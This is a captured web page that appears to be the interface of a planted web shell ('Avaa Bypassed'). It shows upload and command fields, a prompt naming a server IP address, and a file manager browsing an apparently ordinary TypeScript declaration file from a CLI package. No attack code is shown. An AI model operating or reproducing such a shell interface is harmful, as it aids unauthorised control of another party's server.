404

[ Avaa Bypassed ]




Upload:

Command:

botdev@18.225.254.112: ~ $
import { Project } from '../';
export declare class CustomProject extends Project {
    readonly type: 'custom';
    /**
     * We can't detect custom project types. We don't know what they look like!
     */
    detected(): Promise<boolean>;
    requireBuildRunner(): Promise<import('./build').CustomBuildRunner>;
    requireServeRunner(): Promise<import('./serve').CustomServeRunner>;
    requireGenerateRunner(): Promise<never>;
}

Filemanager

Name Type Size Permission Actions
build.d.ts File 571 B 0644
build.js File 1.1 KB 0644
index.d.ts File 434 B 0644
index.js File 1.29 KB 0644
serve.d.ts File 513 B 0644
serve.js File 1.51 KB 0644